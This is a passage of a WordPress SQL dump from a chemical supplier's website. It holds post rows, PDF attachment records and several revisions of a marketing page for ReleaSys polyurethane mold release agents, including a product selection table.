INSERT INTO `wp_posts` VALUES (2843, 0, '2016-11-03 14:39:29', '2016-11-03 14:39:29', '', '', '', 'publish', 'closed', 'closed', '', '2843', '', '', '2016-11-03 14:39:29', '2016-11-03 14:39:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/2843/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2844, 3, '2016-11-03 16:25:22', '2016-11-03 16:25:22', '', 'releasys-89', '', 'inherit', 'closed', 'closed', '', 'releasys-89-3', '', '', '2016-11-03 16:25:22', '2016-11-03 16:25:22', '', 425, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-89-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2845, 3, '2016-11-03 16:25:48', '2016-11-03 16:25:48', '', 'releasys-product-guide-aerosol', '', 'inherit', 'closed', 'closed', '', 'releasys-product-guide-aerosol', '', '', '2016-11-03 16:25:48', '2016-11-03 16:25:48', '', 425, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-aerosol.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2846, 3, '2016-11-03 16:29:09', '2016-11-03 16:29:09', 'ReleaSys 8900 Release Agent  TDS', 'ReleaSys 8900 Release Agent  TDS', 'ReleaSys 8900 Release Agent  TDS', 'inherit', 'closed', 'closed', '', 'releasys-8900-4', '', '', '2016-11-03 16:29:20', '2016-11-03 16:29:20', '', 310, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-8900-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2847, 3, '2016-11-03 16:29:32', '2016-11-03 16:29:32', 'ReleaSys Release Agent Product Overview', 'ReleaSys Release Agent Product Overview', 'ReleaSys Release Agent Product Overview', 'inherit', 'closed', 'closed', '', 'releasys-product-guide-2', '', '', '2016-11-03 16:30:16', '2016-11-03 16:30:16', '', 310, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2848, 3, '2016-11-03 16:31:52', '2016-11-03 16:31:52', '', 'releasys-8800', '', 'inherit', 'closed', 'closed', '', 'releasys-8800', '', '', '2016-11-03 16:31:52', '2016-11-03 16:31:52', '', 290, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-8800-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2849, 3, '2016-11-03 16:33:27', '2016-11-03 16:33:27', '', 'releasys-88', '', 'inherit', 'closed', 'closed', '', 'releasys-88-3', '', '', '2016-11-03 16:33:27', '2016-11-03 16:33:27', '', 423, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-88-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2850, 3, '2016-11-03 16:35:35', '2016-11-03 16:35:35', '', 'releasys-8500', '', 'inherit', 'closed', 'closed', '', 'releasys-8500', '', '', '2016-11-03 16:35:35', '2016-11-03 16:35:35', '', 293, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-8500-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2851, 3, '2016-11-03 16:36:45', '2016-11-03 16:36:45', '', 'releasys-85', '', 'inherit', 'closed', 'closed', '', 'releasys-85-3', '', '', '2016-11-03 16:36:45', '2016-11-03 16:36:45', '', 419, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-85-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2852, 3, '2016-11-03 16:39:40', '2016-11-03 16:39:40', '', 'releasys-8200', '', 'inherit', 'closed', 'closed', '', 'releasys-8200', '', '', '2016-11-03 16:39:40', '2016-11-03 16:39:40', '', 297, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-8200-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2853, 3, '2016-11-03 16:41:18', '2016-11-03 16:41:18', '', 'releasys-82', '', 'inherit', 'closed', 'closed', '', 'releasys-82-3', '', '', '2016-11-03 16:41:18', '2016-11-03 16:41:18', '', 400, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-82-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2854, 140, '2016-11-03 16:44:39', '2016-11-03 16:44:39', '', '', '', 'publish', 'closed', 'closed', '', '2854', '', '', '2016-11-03 16:44:39', '2016-11-03 16:44:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/2854/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2855, 142, '2016-11-03 17:50:38', '2016-11-03 17:50:38', '', '', '', 'publish', 'closed', 'closed', '', '2855', '', '', '2016-11-03 17:50:38', '2016-11-03 17:50:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/2855/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2856, 0, '2016-11-03 18:11:26', '2016-11-03 18:11:26', '', '', '', 'publish', 'closed', 'closed', '', '2856', '', '', '2016-11-03 18:11:27', '2016-11-03 18:11:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/2856/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2857, 0, '2016-11-03 18:13:57', '2016-11-03 18:13:57', '', '', '', 'publish', 'closed', 'closed', '', '2857', '', '', '2016-11-03 18:13:57', '2016-11-03 18:13:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/2857/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2859, 82, '2016-11-03 20:14:29', '2016-11-03 20:14:29', '', '', '', 'publish', 'closed', 'closed', '', '2859', '', '', '2016-11-03 20:14:30', '2016-11-03 20:14:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/2859/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2869, 3, '2016-11-04 15:53:18', '2016-11-04 15:53:18', '<hr />\r\n\r\n<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1 style="text-align: center;">High Performance, Specialized Polyurethane Mold Release Agents</h1>\r\n<span style="font-size: 105%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research, development and technical expertise.  Our mold release agents are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong><span style="font-size: 105%;">Application Guide for Polyurethane Mold Relea</span>se Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 105%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 105%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 105%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 105%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 105%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 105%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Rapid Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Satin</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | ReleaSys™', '', 'publish', 'closed', 'closed', '', 'polyurethane-mold-release-agents', '', '', '2016-12-22 16:56:20', '2016-12-22 16:56:20', '', 0, 'https://www.miller-stephenson.com/?p=2869', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2870, 3, '2016-11-04 12:52:39', '2016-11-04 12:52:39', '<hr />\r\n\r\n<h1>High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\nMiller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to Miller-Stephenson’s ReleaSys semi-permanent line.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:\r\n<ul>\r\n 	<li><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our ReleaSys product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</li>\r\n 	<li><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</li>\r\n 	<li><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</li>\r\n 	<li><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</li>\r\n 	<li><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ulitmately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</li>\r\n 	<li><strong>W<span style="text-decoration: underline;">ater-based, no/low VOC emissions, cleaner safer working environments:</span></strong> If you’re in a region that has strict VOC regulations and air quality permitting, or if you need products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are water-based, low VOC or even VOC-free. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</li>\r\n 	<li><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong></li>\r\n</ul>', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 12:52:39', '2016-11-04 12:52:39', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2871, 3, '2016-11-04 15:02:07', '2016-11-04 15:02:07', '<hr />\r\n\r\n<h1>High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\nMiller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to Miller-Stephenson’s ReleaSys semi-permanent line.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:\r\n<ul>\r\n 	<li><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our ReleaSys product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</li>\r\n 	<li><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</li>\r\n 	<li><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</li>\r\n 	<li><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</li>\r\n 	<li><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</li>\r\n 	<li><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> If you’re in a region that has strict VOC regulations and air quality permitting, or if you need products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are water-based, low VOC or VOC-free. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</li>\r\n 	<li><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</li>\r\n</ul>\r\n<h2>Application Guide</h2>\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 15:02:07', '2016-11-04 15:02:07', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2872, 3, '2016-11-04 15:48:04', '2016-11-04 15:48:04', '', 'Polyurethane Mold Release Agents', '', 'inherit', 'closed', 'closed', '', 'shutterstock_407802055-1', '', '', '2016-11-24 04:11:18', '2016-11-24 04:11:18', '', 2869, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_407802055-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2873, 3, '2016-11-04 15:51:57', '2016-11-04 15:51:57', '<hr />\r\n\r\n<h1>High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\nMiller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:\r\n<ul>\r\n 	<li><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</li>\r\n 	<li><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</li>\r\n 	<li><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</li>\r\n 	<li><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</li>\r\n 	<li><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</li>\r\n 	<li><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> If you’re in a region that has strict VOC regulations and air quality permitting, or if you need products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</li>\r\n 	<li><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</li>\r\n</ul>\r\n<h2>Application Guide for Polyurethane Mold Release Agents :</h2>\r\n<h3><strong>Key applications include:</strong></h3>\r\n<span style="text-decoration: underline;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li>Automotive and Recreational seating</li>\r\n 	<li>Guards and Cushioning equipment</li>\r\n 	<li>Sporting and Safety equipment (helment, shoulder pads)</li>\r\n</ul>\r\n<span style="text-decoration: underline;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li>Pillows and Mattresses</li>\r\n 	<li>Insulation</li>\r\n</ul>\r\n<span style="text-decoration: underline;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li>Bowling pins</li>\r\n 	<li>Golf carts</li>\r\n 	<li>Automotive Dashboards</li>\r\n</ul>\r\n<h1>Selection Guide:</h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><strong><span style="color: #0000ff;">Product</span></strong></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><strong><span style="color: #0000ff;">Carrier Solvent </span></strong></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><strong><span style="color: #0000ff;">Finish </span></strong></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><strong><span style="color: #0000ff;">Description</span></strong></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3">ReleaSys 8800</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td>• Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Cure (1-2 min)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3">ReleaSys 8500</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td>• Medium Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Immediate Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4">ReleaSys 8900</td>\r\n<td style="text-align: center;" rowspan="4">Solvent-based</td>\r\n<td style="text-align: center;" rowspan="4">Matte - Semigloss</td>\r\n<td>• High Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Dry and Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 15:51:57', '2016-11-04 15:51:57', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2874, 3, '2016-11-24 04:11:52', '2016-11-24 04:11:52', '<hr />\n\n<h1 style="text-align: center;">High Performance, Specialized Polyurethane Mold Release Agents</h1>\n<span style="font-size: 105%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research, development and technical expertise.  Our mold release agents are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\n<ul>\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\n</ul>\n<h2><span 